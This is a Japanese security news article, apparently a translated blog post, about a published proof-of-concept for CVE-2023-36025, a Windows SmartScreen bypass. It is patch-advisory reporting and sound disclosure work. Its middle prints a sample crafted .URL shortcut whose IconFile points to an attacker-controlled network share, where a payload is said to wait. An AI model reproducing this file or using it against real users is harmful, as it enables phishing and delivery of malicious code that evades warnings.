Researchers Published PoC Exploit for Windows Zero-Day CVE-2023-36025 Vulnerability
2023/11/21 SecurityOnline — Microsoft がリリースしたパッチを解析し、脆弱性 CVE-2023-36025 の PoC エクスプロイトを作成した、セキュリティ研究者たちがいる。この脆弱性は、発見された後にパッチが適用されており、脅威アクターによる悪用は確認されていない。CVE-2023-36025 (CVSS:8.8) は、Windows SmartScreen コンポーネント内の高度なセキュリティ機能バイパスの脆弱性である。Microsoft のアドバイザリによると、この脆弱性の悪用に成功した攻撃者は、通常の SmartScreen チェックや関連する警告を回避し、特別に細工されたインターネット・ショートカット (.URL) や、悪意のファイルを指すハイパーリンクを、ユーザーがクリックするように仕向けるという。
Microsoft は、「攻撃者たちは、Windows Defender の SmartScreen チェックと、それに関連するプロンプトをバイパスできる。この脆弱性の悪用は、特別に細工されたショートカットやファイルを指すリンクを、ユーザーにクリックさせることで達成される」と、Patch Tuesday で詳述している。
この脆弱性は、Splunk の Will Metcalf/Microsoft Threat Intelligence/Microsoft Office Product Group Security Team により発見/報告された。
以下は、一見すると無害なインターネット・ショートカット・ファイルだ。
[InternetShortcut]
URL=malicious-website.com
IDList=
IconFile=\\\\\\\\192.168.1.100\\\\share\\\\icon.ico
IconIndex=1
この .URL ファイルは、正規のものを装っているが、ターゲットを悪意の Web サイトへと誘導するものだ。この仕掛けは IconFile のパスにあり、悪意のペイロードが待ち構えている、攻撃者のコントロール下にあるネットワーク上の場所へとユーザーを誘導する。
このファイルは、フィッシング・メールや危険な Web サイトのように、ありふれた手法で配布される可能性がある。ターゲットが、この悪意の .URL ファイルをクリックすると、通常の SmartScreen 警告は表示されない。その代わりに、悪意のサイトへのダイレクトな誘導や、有害なコードの実行が引き起こされる。
Security Lit Limited は、CVE-2023-36025 に対して有効な PoC エクスプロイトを作成した。この PoC は、細工されたインターネット・ショートカット・ファイルまたはハイパーリンクが、SmartScreen によるフラグを回避し、潜在的な悪用につながる様子を強調している。
Microsoft は、この脆弱性に対処するパッチをリリースしている。ユーザーに対して強く推奨されるのは、このパッチを直ちに適用し、システムを保護することである。
この脆弱性 CVE-2023-36025 は、2023年11月の Patch Tuesday で、ゼロデイとして報告されていたものです。Security Lit Limited が PoC エクスプロイトを提供したことで、この記事がポストされたのだと思います。最近の Microsoft 関連の記事としては、2023/11/14 の「Azure CLI の深刻な脆弱性 CVE-2023-36052 が FIX:認証情報が漏洩する可能性」や、2023/11/17 の「Microsoft Exchange の脆弱性 CVE-2023-36439:インターネット上に 63,000 台の危険なサーバ」などがあります。よろしければ、ご参照ください。
IoT OT Security News 
You must be logged in to post a comment.